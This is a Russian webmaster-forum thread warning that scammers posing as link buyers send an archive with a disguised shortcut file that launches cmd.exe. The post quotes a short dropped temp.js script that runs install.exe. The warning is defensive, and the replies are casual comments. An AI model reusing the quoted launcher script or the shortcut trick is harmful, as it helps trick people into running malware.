Осторожно, грузят шеллы в процессе покупки ссылок

LebedevStr
На сайте с 17.08.2011
Offline
105
770

Осторожно, мошенники.

ICQ: 58302593.

Добавляются в контакты с просьбой разместить ссылку.

Высылают ссылку на статью, которая залита на ФО.

Содержимое архива.

Как видно, файл readme.ink - ярлык.

Который с командой /c poster.png ссылается на файл cmd.exe.

Закрепил файл, который появился после распаковки, вместе с ним temp.js, install.exe.

temp.js:

var WSHShell = WScript.CreateObject('WScript.Shell');
WSHShell.Run('install.exe',1);
WSHShell.Run('read.txt',1);

Не знаю на сколько это опасно, я так понимаю школьный метод.

Думаю кому и пригодится.

Будьте бдительны.

txt read.txt
The WishMaster
На сайте с 29.09.2005
Offline
2486
#1

Кто в здравом уме будет кликать по таким файлам?

Пишу тексты. Тематики - туризм, СЕО, творчество, кулинария, шизотерика :) Лучший хостер и регистратор. Проверено. (http://ukrnames.com/?ref_id=3599) Проверяю позиции сайта в сервисе Серпхант (https://serphunt.ru/)
Staid
На сайте с 30.07.2014
Offline
59
#2
LebedevStr:
Высылают ссылку на статью, которая залита на ФО.

Извращенцы какие-то. :)

melkozaur
На сайте с 06.04.2010
Offline
495
#3

Санитары леса, респект ребятам.

Серверы в NL/US со скидкой 30% нашим читателям: E5-2650v4/10GB DDR4/240GB SSD/1 Gbps - от $20: https://ua-hosting.company/vps/nl SEO без компромиссов: https://seoleaks.net SEOLEAKS - продвижение сайтов: https://www.instagram.com/seoleaks
molo
На сайте с 30.09.2011
Offline
107
#4

А че за ФО? Скайп?

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий